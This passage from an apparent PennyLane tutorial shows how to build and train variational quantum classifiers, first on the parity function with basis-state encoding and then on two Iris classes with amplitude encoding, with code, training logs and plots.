official docs which have all the instructions. Create a new React Native project by running this command. react-native init WebViewTest Once the project has been created your terminal should look like this. Add some code to the project Open /WebViewTest/App.js. We will modify the code and add a WebView. Import the WebView component and define it inside the render() function. You can copy-paste the code below to your App.js file. We specify the web page URL inside the uri property of the source attribute. Here we are trying to open the Google search home page. /** * Sample React Native App * * * @format * @flow */ import React from 'react'; import { StyleSheet, View, StatusBar, WebView } from 'react-native'; class App extends React.Component { render() { return ( <View style={styles.conatiner}> <WebView source={{ uri: '' }} /> </View> ); } }; const styles = StyleSheet.create({ conatiner: { flex: 1 } }); export default App; Let’s run the app now. I am launching it on an iOS simulator. How to do that? First, start the metro bundler. It’s a local server that will bundle and compile your JavaScript. (eg. Babel transpile…) cd WebViewTest/ npm start Now run the app from XCode. Open /WebViewTest/ios/WebViewTest.xcworkspace and hit the Run button. What do you see? Probably an error like this below. That’s because React Native core has deprecated the WebView component. It instead recommends using the react-native-webview module/component from react-native-community Let’s fix the error Install react-native-webview component. Using Yarn: yarn add react-native-webview If using NPM: npm install --save react-native-webview Link native dependencies: react-native link react-native-webview Install the necessary pods: cd ios/ pod install Now we are ready to use the component. Go back to App.js and modify it. Import the new WebView component. import { WebView } from 'react-native-webview'; Copy-paste the full code if needed. /** * Sample React Native App * * * @format * @flow */ import React from 'react'; import { StyleSheet, View, StatusBar, } from 'react-native'; import { WebView } from 'react-native-webview'; class App extends React.Component { render() { return ( <View style={styles.conatiner}> <WebView source={{ uri: '' }} /> </View> ); } }; const styles = StyleSheet.create({ conatiner: { flex: 1 } }); export default App; Start the metro bundler again from the root of the project: npm start Rebuild and relaunch the App from XCode. Hit the run button the same as before. What do you see? – You should now see the WebView showing the Google page now. So our app is working now. How do I know that it is a WebView? You can try changing the URL of the page. Change it to amazon.com and see what happens? What other attributes/props it supports? There are a lot of other useful properties for which you can refer to the official Github repo guide. Give me a shout out in the comments section if you liked this tutorial. Also, do share it if you liked it. Integrate iFrame with React Native project I have a separate step by step tutorial for that. Hello I want to load HTML, a bunch of CSS and JS files inside native webview using React Native. I have tried using react-native-webview but it throws an error saying js, CSS *cannot be loaded as its extension is not registered in assetExts*. What I want to achieve is as below: 1. Download Zip 2. Unzip in iPad directory which creates a folder containing HTML, CSS, JS 3. Now if I load this folder i.e. index.html in my native webview it should show a presentation in full-screen webview. Approach: 1. To try out the react-native-webview library. 2. To create a custom library in React Native for ios which I don’t know how to do(Need help if it is suitable). I do understand this may not be a helpful post for everyone but please like the post or comment so that everyone can have a look. This is really critical for me in my project.
https://josephkhan.me/webview-in-react-native/
CC-MAIN-2021-04
refinedweb
1,042
68.16
It is probably well known that the Norwegian Meteorological Institute produces a weather forecast, predicting the weather several days into the future. This weather forecast includes a vector field of air velocities at 10 m elevation above the ground, commonly known as “the wind”. Less well known is that they also produce a forecast for the ocean, which includes a velocity field describing the ocean currents about two days into the future. In the event of an oil spill at sea, this informationcan be used to predict where the oil will end up, which in turn can be used to direct response operations to try to minimise the damage. During for example the Deepwater Horizon oil spill in the Gulf of Mexico in 2010, numerical simulations were used daily to predict what would happen over the next few days. The goal of this notebook is to simulate transport of matter by ocean currents. While oil spills at sea are relatively well known from media coverage, it is by no means an easy task to simulate what happens. Oil spilled at sea displays quite complex behaviour: it can form droplets submerged in the water, continuous slicks at the surface, it will partially dissolve, partially evaporate and partially biodegrade, and it can form stable oil-in-water emulsions, all of which will significantly alter its properties. For these reasons, we will study the simpler case of transport of a dissolved chemical. A dissolved chemical will move in the same way as the surrounding water, without sinking or rising due to differences in density. We will study the transport of dissolved chemicals in the ocean using a particle method. We will read data which are provided by the Norwegian Meteorological Institute (MET), interpolate these data and use them to calculate trajectories. We will also plot positions and concentration fields on a map, using various python library packages. In our simulations, we will represent the dissolved matter as numerical particles, also called “Lagrangian elements”. The idea is that a numerical particle will represent a given amount of dissolved matter. This is not to be interpreted as an actual, physical particle, but simply as a numerical approximation. If we have large numbers of numerical particles, they can be used to calculate concentration, which is proportional to the density of particles (that is, the number of particles in a volume). We assume that the presence of the particles don’t affect the motion of the water, so we can take the velocity of the water as a given. We also assume that the particle always moves with the same velocity as the water. This is essentially the same as saying the particle has no inertia. In this model, if you give the particle some velocity, and release it, the motion will immediately be damped, due to friction against the water. It is therefore called the overdamped limit. This model is described by the ODE\begin{equation} \dot{\textbf{x}} = \textbf{v}_w(\textbf{x}, t), \label{eq:1} \end{equation} where $\dot{\textbf{x}}$ is the velocity vector of the particle and $\textbf{v}_w(\textbf{x}, t)$ is the velocity (current) of the water at position $\textbf{x}$ and time $t$ . When the drag coefficient between the water and the particle is large, the overdamped limit is a good approximation. In this example, we will use pre-calculated ocean current data to tell us the velocity of the water, $\textbf{v}_w$, as a function of $\textbf{x}$ and $t$. The oceanographic data are produced by MET, and they are the results of running a numerical simulation engine known as ROMS, on a model domain known as NorKyst800m. It provides information about current velocities, water temperature and salinity for an area covering the entire Norwegian coast, at 800m × 800m horizontal resolution, with 12 vertical layers, and with a time resolution of 1 hour. The data are available for download as NetCDF [2] files, or the data can be accessed via OPeNDAP [3]. NetCDF is a file format for storing data in arrays. It is quite well suited for medium to large amounts of data (up to 100's of gigabytes in a single file works fine), and it is very commonly used for geographical data, such as ocean or atmosphere data. In order to access the data, we will use the python library xarray [4]. The data files contain the $x$ and $y$ components of the velocity field, stored in two variables named $u$ and $v$ (it is quite common to store only the horizontal components of the current velocity). These variables are stored as rank 4 arrays, which give their values as a function of time, depth, y position and x position (note that the order of the dimensions in the files is $(t, z, y, x)$). The coordinates of the grid points along these dimensions are also stored in the data files, in the variables $time$, $depth$, $Y$, and $X$. For simplicity, we will ignore the depth dimension, dealing only with movement in the horizontal plane, and time. In Fig. 1, temperature data for the surface water is shown, as an example to illustrate the extent of the available data. In Fig. 2, the same data are shown in the coordinate system used in the file, with the $x$ coordinates on the horizontal axis, and the $y$ coordinates on the vertical. The origin of the coordinate system is at the North Pole. The dimensions $x$ and $y$, as shown in Fig. 2, are the coordinate axes in what is known as a polar stereographic projection of the Earth’s surface onto a plane. For the purpose of this project, we will deal with motion in the $xy$-plane, with coordinates as shown. As the vector components of the velocity field are aligned with these coordinate axes, we can use the components directly to calculate motion in the $xy$-plane. This means that for the transport simulations, we will ignore the curvature of the Earth. In the end, we will see how to transform from $xy$-coordinates to longitude and latitude, and plot the particle positions on a map. Figure 1: The domain of the NorKyst800m model, showing surface water temperatures on February 4, 2017. Figure 2: The domain of the NorKyst800m model, shown in the coordinate system used to store the data. The origin of the coordinate system is at the North pole (marked with ×), and the distances are in meters. After calculating how the particles are transported with the ocean currents, we will plot their trajectories and positions on a map. There are two main libraries in use to plot data on maps with python, basemap and cartopy. In this example, we will use cartopy [5], which is slightly easier to use. cartopy is a Python package designed to make drawing maps for data analysis and visualisation as easy as possible. When moving particles around with the water velocity, we will use the coordinate system shown in Fig. 2. For plotting trajectories, it is straightforward to just use those coordinates directly, which will show distances in meters. However, if we want to show the trajectories on a map, we need to convert from the $xy$ coordinatesystem of the polar stereographic projection, to longitude and latitude. We will use a library called pyproj [6]. This Python package performs cartographic transformations and geodetic computations. The class pyproj.Proj can convert from geographic (longitude, latitude) to native map projection $(x,y)$ coordinates and vice versa, or from one map projection coordinate system directly to another. We want to represent the transport of a dissolved chemical in the ocean, by simulating the motion of a large number of particles. A particle’s trajectory is controlled by Eq. \eqref{eq:1}, where $\textbf{v}_w$ is taken from the ocean current data. The prepared datafile Norkyst-800m.nc containins 20 days of data spanning from February 1 to February 20, 2017. The file is available for download here: The motion of any one particle is not affected by the presence of other particles. We start out with a collection of $N_p$ particles, each particle at a position $\textbf{x}_0$ at $t = 0$, randomly placed in the square defined by $−3010000 < x < −2990000$ , $−1210000 < y < −1190000$. All particles are transported with the ocean current for a time of 10 days. To propagate the particles we use the Explicit Trapezoid Method as an integrator. The timestep is set to $h = 3600$ s and since the data is provided at intervals of one hour, no interpolation in time is needed. We will now do the following: %matplotlib inline from time import time from datetime import datetime, timedelta import numpy as np from matplotlib import pyplot as plt # nicer looking default plots plt.style.use('bmh') # Library to read data from NetCDF files import xarray as xr # 2D spline interpolation routine from scipy.interpolate import RectBivariateSpline # Map plotting library import cartopy # The subclass CRS contains all types of coordinate # reference systems. We will mainly be using the # projection NorthPolarStereo import cartopy.crs as ccrs # The subclass feature represents a collection of points, # lines, and polygons with convenience methods for common # drawing and filtering operations. import cartopy.feature as cfeature # library for coordinate transformations import pyproj As an in-memory representation of the NetCDF-file, Norkyst-800m.nc, we use the xarray data structure xarray.dataset. It is a dictionary-like container of labeled arrays with aligned dimensions. Its dictionary-like interface can be used to access any variable in the dataset. Read more about xarray.dataset here. In this example the $x$ and $y$ components of the velocity field are stored as u and v and the grid coordinates as the arrays X, and Y. The time variable time is stored as a datatime64 type. An array of specific velocity component values at the grid coordinates $(x_0, y_0), ..., (x_i, y_i)$ is returned by running dataset.u[time, depth, y0:yi, x0:xi]. datapath = "~/downloads/NorKyst-800m.nc" d = xr.open_dataset(datapath) Now, we define a few utility functions. To interpolate the velocity $\textbf{v}_w$ to an arbritary point $(x, y)$ on the $xy$ coordinate system, we use the class RectBivariateSpline from scipy.interpolate, as discussed earlier. This is implemented in the class Interpolator, as defined beneath. Interpolator has the datafile representation dataset as a member variable. class Interpolator(): """ Interpolating the datasets velocity components using bivariate spline interpolation over a rectangular mesh. The memberfunction get_interpolators returns functions for the velocity components' interpolated value at arbitrary positions. Parameters ---------- dataset : xarray_type Data structure containing the oceanographic data. X : array_type Particle coordinates. t : datetime64_type Time. ---------- """ def __init__(self, dataset): self.dataset = dataset def get_interpolators(self, X, it): # Add a buffer of cells around the extent of the particle cloud buf = 3 # Find extent of particle cloud in terms of indices imax = np.searchsorted(self.dataset.X, np.amax(X[0,:])) + buf imin = np.searchsorted(self.dataset.X, np.amin(X[0,:])) - buf jmax = np.searchsorted(self.dataset.Y, np.amax(X[1,:])) + buf jmin = np.searchsorted(self.dataset.Y, np.amin(X[1,:])) - buf # Take out subset of array, to pass to RectBivariateSpline # Transpose to get regular order of coordinates (x,y) # Fill NaN values (land cells) with 0, otherwise # interpolation won't work u = self.dataset.u[it, 0, jmin:jmax, imin:imax].T.fillna(0.0) v = self.dataset.v[it, 0, jmin:jmax, imin:imax].T.fillna(0.0) # RectBivariateSpline returns a function-like object, # which can be called to get value at arbitrary position fu = RectBivariateSpline(self.dataset.X[imin:imax], self.dataset.Y[jmin:jmax], u) fv = RectBivariateSpline(self.dataset.X[imin:imax], self.dataset.Y[jmin:jmax], v) return fu, fv def get_time_index(self, t): # Get index of largest timestamp smaller than (or equal to) t return np.searchsorted(self.dataset.time, t, side='right') - 1 def __call__(self, X, t): # get index of current time in dataset it = self.get_time_index(t) # get interpolating functions, # covering the extent of the particle fu, fv = self.get_interpolators(X, it) # Evaluate velocity at position(x[:], y[:]) vx = fu(X[0,:], X[1,:], grid = False) vy = fv(X[0,:], X[1,:], grid = False) return np.array([vx, vy]) To solve the ODE $\eqref{eq:1}$, we need an integrator. In this example we make use of The Explicit Trapezoid which is a second-order Rung-Kutta method. def rk2(x, t, h, f): """ A second order Rung-Kutta method. The Explicit Trapezoid Method. Parameters: ----------- x : coordinates (as an array of vectors) h : timestep f : A function that returns the derivatives Returns: Next coordinates (as an array of vectors) ----------- """ # Note: t and h have actual time units. # For multiplying with h, we need to # convert to number of seconds: dt = h / np.timedelta64(1, 's') # "Slopes" k1 = f(x, t) k2 = f(x + k1*dt, t + h) # Calculate next position x_ = x + dt*(k1 + k2)/2 return x_ Finally, we define a function to calculate the trajectory of the particles. def trajectory(X0, t0, Tmax, h, f, integrator): """ Function to calculate trajectory of the particles. Parameters: ----------- X0 : A two dimensional array containing start positions (x0, y0) of each particle. t0 : Initial time Tmax: Final time h : Timestep f : Interpolator integrator: The chosen integrator function Returns: A three dimensional array containing the positions of each particle at every timestep on the interval (t0, Tmax). ----------- """ Nt = int((Tmax-t0) / h) # Number of datapoints X = np.zeros((Nt+2, *X0.shape)) X[0,:] = X0 t = t0 for i in range(Nt+1): # Adjust last timestep to match Tmax exactly h = min(h, Tmax - t) t += h X[i+1,:] = integrator(X[i,:], t, h, f) return X # Initialise interpolator with dataset datapath = "~/downloads/NorKyst-800m.nc" d = xr.open_dataset(datapath) f = Interpolator(dataset = d) # Set initial conditions (t0 and x0) and timestep # Note that h also has time units, for convenient # calculation of t + h. h = np.timedelta64(3600, 's') # setting X0 in a slightly roundabout manner for # compatibility with Np >= 1 Np = 10000 X0 = np.zeros((2, Np)) X0[0,:] = np.random.uniform(-3010000, -2990000, size = Np) X0[1,:] = np.random.uniform(-1210000, -1190000, size = Np) # Dataset covers 2017-02-01 00:00 to 2017-02-19 23:00 t0 = np.datetime64('2017-02-01T12:00:00') # Calculate 10 day trajectory Tmax = t0 + np.timedelta64(10, 'D') X1 = trajectory(X0, t0, Tmax, h, f, rk2) The array X1 now contains the $xy$ coordinate for each of the $N_p$ particles at each time $t$. It has the dimensions (Nt, 2, Np). Now, we are able to plot the particles on a map at any time we want, as well as counting the concentration of particles in a defined grid system. To create a figure with stereographic projection we use ccrs, to add coastlines and other features we use cfeature, and to transform the cartesian coordinates to longitude and latitudes we use pyproj. # PLOTTING PARITCLES ON MAP # Step 1 # Create a figure object, and add 6 axes instances, with projection info fig = plt.figure(figsize=(15,10))())) # Step 2: # It doesn't look like a map unless we add land and sea # In order to draw land and coastlines, we use built-in functions # in cartopy.feature. These will download some data from # the first time they are called. # (resolution 10m means 1 : 10,000,000, not 10 meters) land_10m = cfeature.NaturalEarthFeature('physical', 'land', '10m', color = '#dddddd') for ax in axes: # Add land and coastline ax.add_feature(land_10m) ax.coastlines(resolution='10m') # Create projection with metadata from dataset # and latlon projection p1 = pyproj.Proj(d.projection_stere.proj4) p2 = pyproj.Proj(proj='latlong') # Step 3: # Convert coordinates to longitude and latitude lons, lats = pyproj.transform(p1, p2, X1[:,0,:], X1[:,1,:]) # Step 4: # Plot data for i, it in enumerate(np.arange(0, 10*24 + 1, 2*24)): # (start, stop (after 10 days), step (2 days)) axes[i].set_title("Day " + str(0 + 2*i)) axes[i].scatter(lons[it,:], lats[it,:], marker = '.', lw = 0, s = 20, alpha = 0.8, transform=ccrs.Geodetic(), zorder=2) # Step 5 (optional): # Set the extent of the map. If we leave out these, it would # just cover the plotted points, and nothing more. Specify # (lon0, lon1, lat0, lat1), and Cartopy will make sure the # map area is large enough to cover the four points # (lon0, lat0), (lon0, lat1), (lon1, lat0), (lon1, lat1). for ax in axes: ax.set_extent((0, 9, 57.5, 62)) # try to automatically reduce white space in figure plt.tight_layout() As expected, the results shows that the chemical trajects rather collectivly, with little deformation of shape during the first four days. We see that the group moves mainly northwards. The small spreading indicates only slight local differences in the ocean current. The coordinates of the particles are already stored in the array X1. We now only need to define the grid system and count the number of particles in each grid cell. The latter is stored in the two dimensional array counts, where each element represents the concentration of the chemical to the corresponding 800m × 800m grid cell. The concentration is then illustrated by plotting a quadrilateral mesh using the matplotlib.axes function pcolormesh. Grid cells with the lowest concentration are coloured purple, and grids with the highest concentrations are coloured yellow. A masked array is used to only plot those cells with nonzero concentrations. The function plt.pcolormesh() basically plots each element of a 2D array as a tiny rectangle. For each tiny rectangle, it needs to know three things: $x$-coordinate, $y$-coordinate, and value. The values are the counts. The coordinates must be transformed from 1D arrays to 2D arrays, of the same shape as the counts. For this, np.meshgrid is used. To count the particles in each grid, we use the numpy function np.histogram2d. As parameters this function needs the $x$ and $y$ coordinates of the points to be histogrammed, as well as a bin specification, which in this case is the extent of the grid system. # CALCULATING AND PLOTTING GRIDDED CONCENTRATION # Creating figure, axes and plotting features as in task a. fig = plt.figure(figsize=(15, 10)) land_10m = cfeature.NaturalEarthFeature('physical', 'land', '10m', color='#dddddd')())) for ax in axes: # Add land and coastline ax.add_feature(land_10m) ax.coastlines(resolution='10m') # Set the extent of the map. (lon0, lon1, lat0, lat1) ax.set_extent((1, 5.1, 59.4, 61)) # Create projection with metadata from dataset # and latlon projection p1 = pyproj.Proj(d.projection_stere.proj4) p2 = pyproj.Proj(proj='latlong') # Plot concentrations on the map. for i, it in enumerate(np.arange(0, 241, 48)): # Particle positions at current time x = X1[it, 0, :] y = X1[it, 1, :] # Grid size (m) wid = 800 # Uses the particles position to define the extent of the grid system, for each time. Xcoords = np.arange(np.amin(x) - 2*wid, np.amax(x) + 2*wid, wid) Ycoords = np.arange(np.amin(y) - 2*wid, np.amax(y) + 2*wid, wid) # To count particles in each cell, we use numpy.histogram2d counts, edgeX, edgeY = np.histogram2d(x, y, bins = (Xcoords, Ycoords)) # Use bin edges returned by function as coordinates edgeX, edgeY = np.meshgrid(edgeX, edgeY) # Convert coordinates lons, lats = pyproj.transform(p1, p2, edgeX, edgeY) # Finally, we have chosen to use a masked array to plot # the grid data. This is mainly for visibility, as it avoids # plotting those cells where the value is 0. # Note that mask = True means that the element is not plotted # (because it is hidden behind the mask) # We use counts == 0 as the mask counts_masked = np.ma.masked_array(counts, mask = counts == 0) axes[i].pcolormesh(lons, lats, counts_masked.T, transform=ccrs.PlateCarree(), zorder=2) axes[i].set_title("Day " + str(0 + 2*i)) plt.tight_layout() For a closer look at the concentration after ten days, we change the extent. fig = plt.figure(figsize=(15, 10)) ax = plt.axes(projection=ccrs.NorthPolarStereo()) ax.coastlines(resolution='10m') # Set extent to match extent of grid system ax.set_extent((np.amin(lons), np.amax(lons), np.amin(lats), np.amax(lats))) cbar = ax.pcolormesh(lons, lats, counts_masked.T, transform=ccrs.PlateCarree(), zorder=2) fig.colorbar(cbar, orientation="vertical", label="Particles per grid cell") ax.set_title("Day 10") plt.show() We have now succsessfully completed a simplified simulation of the movement of a chemical for a period of ten days after a spill, using a representation by numerical particles and assuming the particles moved with the same velocity as the water. The particles were transported by the ocean currents retrieved from a NetCDF-file and represented in an xarray. The gridded velocity components of the current were interpolated using a scipy-function, and the trajectory of the numerical particles were calculated using the Explicit Trapezoid Method as integrator with a time step of an hour. Finally, the position and the concentration of the oil were plotted on a map using the Python packages cartopy and pyproj. [1]: Tor Nordam, Jonas Blomberg Ghini, Jon Andreas Støvneng. Project Assignment: Particle-based simulation of transport by ocean currents, 2017. [2]: Network common data form, see. [3]: Open-source Project for a Network Data Access Protocol, see. [4]: XArray.dataset doc @. [5]: For more Cartopy reference systems and map axes features, see cartopy. [6]: Pyproj docs @github.
https://nbviewer.jupyter.org/urls/www.numfys.net/media/notebooks/oil_spill.ipynb
CC-MAIN-2019-43
refinedweb
3,544
56.35
Variational classifier¶ In this tutorial, we show how to use PennyLane to implement variational quantum classifiers - quantum circuits that can be trained from labelled data to classify new data samples. The architecture is inspired by Farhi and Neven (2018) as well as Schuld et al. (2018). We will first show that the variational quantum classifier can reproduce the parity function This optimization example demonstrates how to encode binary inputs into the initial state of the variational circuit, which is simply a computational basis state. We then show how to encode real vectors as amplitude vectors (amplitude encoding) and train the model to recognize the first two classes of flowers in the Iris dataset. 1. Fitting the parity function¶ Imports¶ As before, we import PennyLane, the PennyLane-provided version of NumPy, and an optimizer. import pennylane as qml from pennylane import numpy as np from pennylane.optimize import NesterovMomentumOptimizer Quantum and classical nodes¶ We create a quantum device with four “wires” (or qubits). dev = qml.device("default.qubit", wires=4) Variational classifiers usually define a “layer” or “block”, which is an elementary circuit architecture that gets repeated to build the variational circuit. Our circuit layer consists of an arbitrary rotation on every qubit, as well as CNOTs that entangle each qubit with its neighbour. def layer(W): qml.Rot(W[0, 0], W[0, 1], W[0, 2], wires=0) qml.Rot(W[1, 0], W[1, 1], W[1, 2], wires=1) qml.Rot(W[2, 0], W[2, 1], W[2, 2], wires=2) qml.Rot(W[3, 0], W[3, 1], W[3, 2], wires=3) qml.CNOT(wires=[0, 1]) qml.CNOT(wires=[1, 2]) qml.CNOT(wires=[2, 3]) qml.CNOT(wires=[3, 0]) We also need a way to encode data inputs \(x\) into the circuit, so that the measured output depends on the inputs. In this first example, the inputs are bitstrings, which we encode into the state of the qubits. The quantum state \(\psi\) after state preparation is a computational basis state that has 1s where \(x\) has 1s, for example We use the BasisState function provided by PennyLane, which expects x to be a list of zeros and ones, i.e. [0,1,0,1]. def statepreparation(x): qml.BasisState(x, wires=[0, 1, 2, 3]) Now we define the quantum node as a state preparation routine, followed by a repetition of the layer structure. Borrowing from machine learning, we call the parameters weights. @qml.qnode(dev) def circuit(weights, x=None): statepreparation(x) for W in weights: layer(W) return qml.expval(qml.PauliZ(0)) Different from previous examples, the quantum node takes the data as a keyword argument x (with the default value None). Keyword arguments of a quantum node are considered as fixed when calculating a gradient; they are never trained. If we want to add a “classical” bias parameter, the variational quantum classifer also needs some post-processing. We define the final model by a classical node that uses the first variable, and feeds the remainder into the quantum node. Before this, we reshape the list of remaining variables for easy use in the quantum node. def variational_classifier(var, x=None): weights = var[0] bias = var[1] return circuit(weights, x=x) + bias Cost¶ In supervised learning, the cost function is usually the sum of a loss function and a regularizer. We use the standard square loss that measures the distance between target labels and model predictions. def square_loss(labels, predictions): loss = 0 for l, p in zip(labels, predictions): loss = loss + (l - p) ** 2 loss = loss / len(labels) return loss To monitor how many inputs the current classifier predicted correctly, we also define the accuracy given target labels and model predictions. def accuracy(labels, predictions): loss = 0 for l, p in zip(labels, predictions): if abs(l - p) < 1e-5: loss = loss + 1 loss = loss / len(labels) return loss For learning tasks, the cost depends on the data - here the features and labels considered in the iteration of the optimization routine. def cost(var, X, Y): predictions = [variational_classifier(var, x=x) for x in X] return square_loss(Y, predictions) Optimization¶ Let’s now load and preprocess some data. data = np.loadtxt("variational_classifier/data/parity.txt") X = data[:, :-1] Y = data[:, -1] Y = Y * 2 - np.ones(len(Y)) # shift label from {0, 1} to {-1, 1} for i in range(5): print("X = {}, Y = {: d}".format(X[i], int(Y[i]))) print("...") Out: X = [0. 0. 0. 0.], Y = -1 X = [0. 0. 0. 1.], Y = 1 X = [0. 0. 1. 0.], Y = 1 X = [0. 0. 1. 1.], Y = -1 X = [0. 1. 0. 0.], Y = 1 ... We initialize the variables randomly (but fix a seed for reproducability). The first variable in the list is used as a bias, while the rest is fed into the gates of the variational circuit. np.random.seed(0) num_qubits = 4 num_layers = 2 var_init = (0.01 * np.random.randn(num_layers, num_qubits, 3), 0.0) print(var_init) Out: (array([[[ 0.01764052, 0.00400157, 0.00978738], [ 0.02240893, 0.01867558, -0.00977278], [ 0.00950088, -0.00151357, -0.00103219], [ 0.00410599, 0.00144044, 0.01454274]], [[ 0.00761038, 0.00121675, 0.00443863], [ 0.00333674, 0.01494079, -0.00205158], [ 0.00313068, -0.00854096, -0.0255299 ], [ 0.00653619, 0.00864436, -0.00742165]]]), 0.0) Next we create an optimizer and choose a batch size… opt = NesterovMomentumOptimizer(0.5) batch_size = 5 …and train the optimizer. We track the accuracy - the share of correctly classified data samples. For this we compute the outputs of the variational classifier and turn them into predictions in \(\{-1,1\}\) by taking the sign of the output. var = var_init for it in range(25): # Update the weights by one optimizer step batch_index = np.random.randint(0, len(X), (batch_size,)) X_batch = X[batch_index] Y_batch = Y[batch_index] var = opt.step(lambda v: cost(v, X_batch, Y_batch), var) # Compute accuracy predictions = [np.sign(variational_classifier(var, x=x)) for x in X] acc = accuracy(Y, predictions) print("Iter: {:5d} | Cost: {:0.7f} | Accuracy: {:0.7f} ".format(it + 1, cost(var, X, Y), acc)) Out: Iter: 1 | Cost: 3.4355534 | Accuracy: 0.5000000 Iter: 2 | Cost: 1.9287800 | Accuracy: 0.5000000 Iter: 3 | Cost: 2.0341238 | Accuracy: 0.5000000 Iter: 4 | Cost: 1.6372574 | Accuracy: 0.5000000 Iter: 5 | Cost: 1.3025395 | Accuracy: 0.6250000 Iter: 6 | Cost: 1.4555019 | Accuracy: 0.3750000 Iter: 7 | Cost: 1.4492786 | Accuracy: 0.5000000 Iter: 8 | Cost: 0.6510286 | Accuracy: 0.8750000 Iter: 9 | Cost: 0.0566074 | Accuracy: 1.0000000 Iter: 10 | Cost: 0.0053045 | Accuracy: 1.0000000 Iter: 11 | Cost: 0.0809483 | Accuracy: 1.0000000 Iter: 12 | Cost: 0.1115426 | Accuracy: 1.0000000 Iter: 13 | Cost: 0.1460257 | Accuracy: 1.0000000 Iter: 14 | Cost: 0.0877037 | Accuracy: 1.0000000 Iter: 15 | Cost: 0.0361311 | Accuracy: 1.0000000 Iter: 16 | Cost: 0.0040937 | Accuracy: 1.0000000 Iter: 17 | Cost: 0.0004899 | Accuracy: 1.0000000 Iter: 18 | Cost: 0.0005290 | Accuracy: 1.0000000 Iter: 19 | Cost: 0.0024304 | Accuracy: 1.0000000 Iter: 20 | Cost: 0.0062137 | Accuracy: 1.0000000 Iter: 21 | Cost: 0.0088864 | Accuracy: 1.0000000 Iter: 22 | Cost: 0.0201912 | Accuracy: 1.0000000 Iter: 23 | Cost: 0.0060335 | Accuracy: 1.0000000 Iter: 24 | Cost: 0.0036153 | Accuracy: 1.0000000 Iter: 25 | Cost: 0.0012741 | Accuracy: 1.0000000 2. Iris classification¶ Quantum and classical nodes¶ To encode real-valued vectors into the amplitudes of a quantum state, we use a 2-qubit simulator. dev = qml.device("default.qubit", wires=2) State preparation is not as simple as when we represent a bitstring with a basis state. Every input x has to be translated into a set of angles which can get fed into a small routine for state preparation. To simplify things a bit, we will work with data from the positive subspace, so that we can ignore signs (which would require another cascade of rotations around the z axis). The circuit is coded according to the scheme in Möttönen, et al. (2004), or—as presented for positive vectors only—in Schuld and Petruccione (2018). We had to also decompose controlled Y-axis rotations into more basic circuits following Nielsen and Chuang (2010). def get_angles(x): beta0 = 2 * np.arcsin(np.sqrt(x[1] ** 2) / np.sqrt(x[0] ** 2 + x[1] ** 2 + 1e-12)) beta1 = 2 * np.arcsin(np.sqrt(x[3] ** 2) / np.sqrt(x[2] ** 2 + x[3] ** 2 + 1e-12)) beta2 = 2 * np.arcsin( np.sqrt(x[2] ** 2 + x[3] ** 2) / np.sqrt(x[0] ** 2 + x[1] ** 2 + x[2] ** 2 + x[3] ** 2) ) return np.array([beta2, -beta1 / 2, beta1 / 2, -beta0 / 2, beta0 / 2]) def statepreparation(a): qml.RY(a[0], wires=0) qml.CNOT(wires=[0, 1]) qml.RY(a[1], wires=1) qml.CNOT(wires=[0, 1]) qml.RY(a[2], wires=1) qml.PauliX(wires=0) qml.CNOT(wires=[0, 1]) qml.RY(a[3], wires=1) qml.CNOT(wires=[0, 1]) qml.RY(a[4], wires=1) qml.PauliX(wires=0) Let’s test if this routine actually works. x = np.array([0.53896774, 0.79503606, 0.27826503, 0.0]) ang = get_angles(x) @qml.qnode(dev) def test(angles=None): statepreparation(angles) return qml.expval(qml.PauliZ(0)) test(angles=ang) print("x : ", x) print("angles : ", ang) print("amplitude vector: ", np.real(dev._state)) Out: x : [0.53896774 0.79503606 0.27826503 0. ] angles : [ 0.56397465 -0. 0. -0.97504604 0.97504604] amplitude vector: [ 5.38967743e-01 7.95036065e-01 2.78265032e-01 -2.20431956e-17] Note that the default.qubit simulator provides a shortcut to statepreparation with the command qml.QubitStateVector(x, wires=[0, 1]). However, some devices may not support an arbitrary state-preparation routine. Since we are working with only 2 qubits now, we need to update the layer function as well. def layer(W): qml.Rot(W[0, 0], W[0, 1], W[0, 2], wires=0) qml.Rot(W[1, 0], W[1, 1], W[1, 2], wires=1) qml.CNOT(wires=[0, 1]) The variational classifier model and its cost remain essentially the same, but we have to reload them with the new state preparation and layer functions. @qml.qnode(dev) def circuit(weights, angles=None): statepreparation(angles) for W in weights: layer(W) return qml.expval(qml.PauliZ(0)) def variational_classifier(var, angles=None): weights = var[0] bias = var[1] return circuit(weights, angles=angles) + bias def cost(weights, features, labels): predictions = [variational_classifier(weights, angles=f) for f in features] return square_loss(labels, predictions) Data¶ We then load the Iris data set. There is a bit of preprocessing to do in order to encode the inputs into the amplitudes of a quantum state. In the last preprocessing step, we translate the inputs x to rotation angles using the get_angles function we defined above. data = np.loadtxt("variational_classifier/data/iris_classes1and2_scaled.txt") X = data[:, 0:2] print("First X sample (original) :", X[0]) # pad the vectors to size 2^2 with constant values padding = 0.3 * np.ones((len(X), 1)) X_pad = np.c_[np.c_[X, padding], np.zeros((len(X), 1))] print("First X sample (padded) :", X_pad[0]) # normalize each input normalization = np.sqrt(np.sum(X_pad ** 2, -1)) X_norm = (X_pad.T / normalization).T print("First X sample (normalized):", X_norm[0]) # angles for state preparation are new features features = np.array([get_angles(x) for x in X_norm]) print("First features sample :", features[0]) Y = data[:, -1] Out: First X sample (original) : [0.4 0.75] First X sample (padded) : [0.4 0.75 0.3 0. ] First X sample (normalized): [0.44376016 0.83205029 0.33282012 0. ] First features sample : [ 0.67858523 -0. 0. -1.080839 1.080839 ] These angles are our new features, which is why we have renamed X to “features” above. Let’s plot the stages of preprocessing and play around with the dimensions (dim1, dim2). Some of them still separate the classes well, while others are less informative. Note: To run the following code you need the matplotlib library. import matplotlib.pyplot as plt plt.figure() plt.scatter(X[:, 0][Y == 1], X[:, 1][Y == 1], c="r", marker="o", edgecolors="k") plt.scatter(X[:, 0][Y == -1], X[:, 1][Y == -1], c="b", marker="o", edgecolors="k") plt.title("Original data") plt.show() plt.figure() dim1 = 0 dim2 = 1 plt.scatter(X_norm[:, dim1][Y == 1], X_norm[:, dim2][Y == 1], c="r", marker="o", edgecolors="k") plt.scatter(X_norm[:, dim1][Y == -1], X_norm[:, dim2][Y == -1], c="b", marker="o", edgecolors="k") plt.title("Padded and normalised data (dims {} and {})".format(dim1, dim2)) plt.show() plt.figure() dim1 = 0 dim2 = 3 plt.scatter(features[:, dim1][Y == 1], features[:, dim2][Y == 1], c="r", marker="o", edgecolors="k") plt.scatter( features[:, dim1][Y == -1], features[:, dim2][Y == -1], c="b", marker="o", edgecolors="k" ) plt.title("Feature vectors (dims {} and {})".format(dim1, dim2)) plt.show() This time we want to generalize from the data samples. To 